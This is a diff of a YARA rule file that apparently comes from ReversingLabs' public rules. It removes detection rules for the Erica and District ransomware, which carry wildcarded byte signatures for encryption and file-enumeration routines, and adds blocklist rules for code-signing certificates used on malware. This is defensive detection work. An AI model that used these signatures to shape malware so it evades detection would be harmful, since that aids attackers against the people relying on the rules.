-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "93512091943f3a3b395c38fa3b0f5ecdbbf1cdf967ccfea4d7145c940076e046"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11862-L11878"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c534ad306f85e12eca2336e998120deb4ba8d0d63b8331986ec7fe4ac69ba65a"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Erica"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 8B EC 83 C4 ?? 53 56 57 89 4D ?? 8B F2 8B D8 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68
-            ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 89 45 ?? 8A 43 ?? 2C ?? 72 ?? 74 ?? EB ?? BF ??
-            ?? ?? ?? EB ?? BF ?? ?? ?? ?? EB ?? BF ?? ?? ?? ?? 33 DB 68 ?? ?? ?? ?? 8B 45 ?? 50
-            8B 45 ?? 50 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 6A ?? 6A ?? 57 8B 06 50
-            E8 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ??
-            50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 50 6A ?? 8B 45 ?? 50 8B 45 ?? 50
-            8B 06 50 E8 ?? ?? ?? ?? 85 C0 75 ?? BB ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? EB ?? BB ??
-            ?? ?? ?? EB ?? BB ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 33 C0 5A
-            59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
-        }
-		$encrypt_files_p2 = {
-            8D 40 ?? 55 8B EC 83 C4 ?? 53 33 DB 89 5D ?? 89 5D ?? 8B D9 89 55 ?? 89 45 ?? 33 C0
-            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 89 45 ?? 33 C0 89 45 ?? 33 C0 89 45 ?? 33
-            C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? 50 8B 45 ?? 8D 50 ?? 8B 45 ?? 33 C9
-            E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 83 C0 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B
-            40 ?? E8 ?? ?? ?? ?? 8B D0 4A 8B 45 ?? 83 C0 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? E8
-            ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 8B 45 ?? 8B 48 ?? 8B 45 ?? 8D 50 ?? 8B 45 ?? E8 ??
-            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9
-            ?? ?? ?? ?? 8B 45 ?? 50 53 8B 45 ?? 50 8B 45 ?? 50 8D 4D ?? 8D 55 ?? 8B 45 ?? E8 ??
-            ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 89 45 ??
-            8B 45 ?? 50 8D 45 ?? 50 8B 45 ?? 83 C0 ?? E8 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 8B 45
-            ?? 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 8B 45 ?? 83 C0 ?? 8B 55 ??
-            E8 ?? ?? ?? ?? 8B 45 ?? 50 8D 45 ?? 50 8B 45 ?? 83 C0 ?? E8 ?? ?? ?? ?? 50 6A ?? 6A
-            ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 85 C0 74 ?? C7 45 ?? ?? ??
-            ?? ?? 8B 45 ?? 83 C0 ?? 8B 55 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? E8 ?? ?? ?? ?? EB
-            ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 83 C0 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ??
-            ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 8B 45
-            ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 8D 50 ?? 8B 45 ?? 8B 4D ?? E8 ?? ??
-            ?? ?? C3
-        }
-		$find_files = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 5D ?? 8B D9 89 55 ?? 89
-            45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF
-            30 64 89 20 8B C3 E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ??
-            80 7C 02 ?? ?? 74 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45
-            ?? 80 38 ?? 75 ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ??
-            ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 85 F6 0F 95 C0 EB ?? F7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? 77 ?? 83 3B ?? 74 ?? 8B C3 BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            FF 33 FF 75 ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF
-            B5 ?? ?? ?? ?? 8B C3 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ??
-            ?? ?? F7 D8 1B C0 F7 D8 84 C0 75 ?? 56 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO SMART" and pe.signatures [ i ] . serial == "3c:98:b6:87:2f:bb:1f:4a:e3:7a:4c:aa:74:9d:24:c2" and 1613370100 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_E4E795Fd1Fd25595B869Ce22Aa7Dc49F : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "9c6d2be7-093c-5ce2-83af-6ab9b46603bc"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11880-L11898"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ced47bd69b58de9e6b2aa7518ccceca088884acb79c0803c3defe6b115a0abb6"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OASIS COURT LIMITED" and ( pe.signatures [ i ] . serial == "00:e4:e7:95:fd:1f:d2:55:95:b8:69:ce:22:aa:7d:c4:9f" or pe.signatures [ i ] . serial == "e4:e7:95:fd:1f:d2:55:95:b8:69:ce:22:aa:7d:c4:9f" ) and 1608508800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_District : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_E953Ada7E8F1438E5F7680Ff599Ae43E : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects District ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "fc6abbc7-66f9-56e6-8106-5f360f25b092"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "2bce88d4-24e6-59e5-ae02-5284ec43cfa4"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.District.yara#L1-L194"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "9ce395636fd7719f503726df82998e1ac72e9e80fd7a4534bd2251ac9283af38"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11900-L11918"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7cb7d77abefd35f0756c5aa0983f7403cca4cbacd94dcc6b510c929bc96c8309"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "District"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44
-            24 ?? 8B F1 8D 4D ?? 50 E8 ?? ?? ?? ?? 40 C7 44 24 ?? ?? ?? ?? ?? 6A ?? 33 C9 C7 44
-            24 ?? ?? ?? ?? ?? 50 8D 45 ?? 66 89 4C 24 ?? 50 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 EC ??
-            C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 40 C7 84 24 ?? ?? ??
-            ?? ?? ?? ?? ?? 33 C9 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50 51 8D 45 ?? 66 89 8C 24 ??
-            ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 8D
-            44 24 ?? 8D 4C 24 ?? 50 E8 ?? ?? ?? ?? 40 C7 44 24 ?? ?? ?? ?? ?? 6A ?? 33 C9 C7 44
-            24 ?? ?? ?? ?? ?? 50 8D 44 24 ?? 66 89 4C 24 ?? 50 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 EC
-            ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 8D 4C 24 ?? 50 E8 ?? ?? ?? ?? 33 C9 C7 44 24
-            ?? ?? ?? ?? ?? 50 51 8D 44 24 ?? 66 89 4C 24 ?? 50 8D 4C 24 ?? C7 44 24 ?? ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 6A ?? 50 66 89 44 24 ?? 8D 4C 24 ??
-            8D 45 ?? C7 44 24 ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 56 8D 4C 24 ?? E8 ??
-            ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ?? 0F 43 45 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68
-            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 6A ?? 57 FF 15 ??
-            ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 66 0F 6E C0 F3 0F E6 C0 C1 E8 ?? F2 0F 58 04 C5
-            ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 56 E8 ?? ?? ?? ?? 56 8B D8
-        }
-		$encrypt_files_p2 = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 0F 1F 40 ?? 0F 1F 84 00
-            ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 6A ?? A3 ?? ?? ?? ?? 8D 44 24 ?? 50 56
-            53 57 89 0D ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 56 FF 74 24 ?? 8B D3 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? F7 D8 6A
-            ?? 6A ?? 50 57 FF 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 56 FF 74 24 ?? 57 FF 15 ?? ??
-            ?? ?? 83 6C 24 ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 57
-            FF 15 ?? ?? ?? ?? 83 7C 24 ?? ?? 8D 4C 24 ?? 8D 45 ?? 0F 43 4C 24 ?? 83 7D ?? ?? 51
-            0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 83 F8 ?? 72 ?? 40 8D 4C 24 ?? 50 FF 74
-            24 ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ?? 8B 44 24 ?? C7 44
-            24 ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 4C 24 ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 33 C0
-            C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ?? 8B 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 83 F8 ??
-            72 ?? 40 8D 4C 24 ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 66
-            89 44 24 ?? 8B 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 4C 24
-            ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 44 24
-            ?? 8B 44 24 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 4C 24 ?? 50 FF
-            74 24 ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ?? 89 44 24 ?? 8B
-            45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 77 ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6
-            C1 ?? 75 ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77 ?? 8B C8 51 E8 ??
-            ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C2
-        }
-		$find_files = {
-            53 55 56 57 6A ?? 8B F1 E8 ?? ?? ?? ?? 83 C4 ?? 8D 9E ?? ?? ?? ?? 8B E8 53 68 ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 53 50 89 45 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D BE ?? ?? ??
-            ?? 0F 1F 80 ?? ?? ?? ?? F6 03 ?? 57 74 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 75 ?? 57 E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 50 8B CE E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 84 C0 74
-            ?? 8B CE E8 ?? ?? ?? ?? 53 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 80 7C 24 ?? ?? 75
-            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 55 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5D
-            5B C2
-        }
-		$enum_resources_1_p1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 55 56 57 33 C0 C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24
-            ?? 8B DA 8D 44 24 ?? 89 5C 24 ?? 50 51 6A ?? 6A ?? 6A ?? C7 44 24 ?? ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 85 C0 74 ?? 3D ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ??
-            50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? BE ?? ??
-            ?? ?? E9 ?? ?? ?? ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 3D
-            ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 84 24 ??
-            ?? ?? ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 ED 89
-            6C 24 ?? 39 6C 24 ?? 0F 86 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 85 DB 0F 8E ?? ?? ?? ?? C1
-            E5 ?? 8B F3 89 6C 24 ?? 89 5C 24 ?? 0F 1F 84 00 ?? ?? ?? ?? 83 BC 2C ?? ?? ?? ?? ??
-            0F 85 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 74 ?? 8B 84 2C ?? ?? ?? ?? 66 83 78 ?? ?? 8D
-            50 ?? 74 ?? 8D B4 24 ?? ?? ?? ?? 8D 48 ?? 8A 01 8D 52 ?? 88 06 8D 76 ?? 66 83 3A
-        }
-		$enum_resources_1_p2 = {
-            8D 49 ?? 75 ?? 8B 74 24 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50
-            6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B4 2C ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 6A ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? FF 70 ?? 8B 40 ?? 83 E0 ?? 50 8D 84 24 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? C6 44 24 ?? ?? 8B 56 ??
-            F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66
-            A1 ?? ?? ?? ?? 66 89 41 ?? F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 0F 1F 44 00 ?? 8A 41 ?? 8D
-            49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ??
-            88 41 ?? F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 0F 1F 00 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ??
-            ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ??
-            88 41 ?? F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ??
-            89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F6 C2 ?? 74 ?? 8D 4C 24 ?? 49 66 0F 1F 44 00 ??
-            8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F6
-        }
-		$enum_resources_1_p3 = {
-            C2 ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ??
-            ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? F6 C2 ?? 74 ?? 8D
-            4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66
-            89 41 ?? 84 D2 79 ?? 8D 4C 24 ?? 49 0F 1F 40 ?? 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ??
-            ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66
-            89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ??
-            ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41
-            ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ??
-            ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66
-            89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D
-            49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41
-            ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ??
-            ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? F7 C2 ?? ?? ?? ?? 74
-        }
-		$enum_resources_2_p1 = {
-            8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ??
-            ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ?? ?? ??
-            74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ??
-            ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ??
-            8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ??
-            ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01
-            66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C
-            24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89
-            41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ??
-            ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A
-            41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2
-            ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01
-            A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? F7 C2 ?? ??
-            ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89
-        }
-		$enum_resources_2_p2 = {
-            01 A1 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D
-            4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66
-            89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ??
-            ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49
-            8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? F7
-            C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89
-            01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 85 D2 79
-            ?? 8D 4C 24 ?? 49 66 0F 1F 44 00 ?? 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89
-            01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A0 ?? ??
-            ?? ?? 88 41 ?? F7 C2 ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? 49 66 90 8A 41 ?? 8D 49 ?? 84 C0
-            75 ?? A1 ?? ?? ?? ?? 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? 8D 4C 24 ?? 8D 51 ?? 8A 01
-            41 84 C0 75 ?? 2B CA 56 88 44 0C ?? FF D7 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 8D
-        }
-		$enum_resources_2_p3 = {
-            84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 74 24 ?? FF D7 8B BC 2C ?? ?? ?? ?? 33 D2
-            8B CF 8D 71 ?? 8A 01 41 84 C0 75 ?? 2B CE 8D 43 ?? 03 C1 74 ?? 8B 6C 24 ?? 8B DF 8B
-            CB 42 8D 71 ?? 0F 1F 00 8A 01 41 84 C0 75 ?? 2B CE 8D 45 ?? 03 C1 3B D0 72 ?? 8B 6C
-            24 ?? 8B 5C 24 ?? 8B CF 33 D2 8D 71 ?? 8A 01 41 84 C0 75 ?? 2B CE 8D 43 ?? 03 C1 74
-            ?? 8B 9C 2C ?? ?? ?? ?? 8B 6C 24 ?? 0F 1F 40 ?? 8B CB 42 8D 71 ?? 8A 01 41 84 C0 75
-            ?? 2B CE 8D 45 ?? 03 C1 3B D0 72 ?? 8B 6C 24 ?? 8B 5C 24 ?? 33 D2 8D 4F ?? 8A 07 47
-            84 C0 75 ?? 2B F9 8D 43 ?? 03 C7 74 ?? 8B BC 2C ?? ?? ?? ?? 0F 1F 40 ?? 8B C7 42 8D
-            70 ?? 8A 08 40 84 C9 75 ?? 2B C6 40 03 C3 3B D0 72 ?? 8B 3D ?? ?? ?? ?? 8B 74 24 ??
-            83 EE ?? 89 74 24 ?? 0F 85 ?? ?? ?? ?? 8B 6C 24 ?? 8B F5 C1 E6 ?? 8B 84 34 ?? ?? ??
-            ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? FF 24 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68
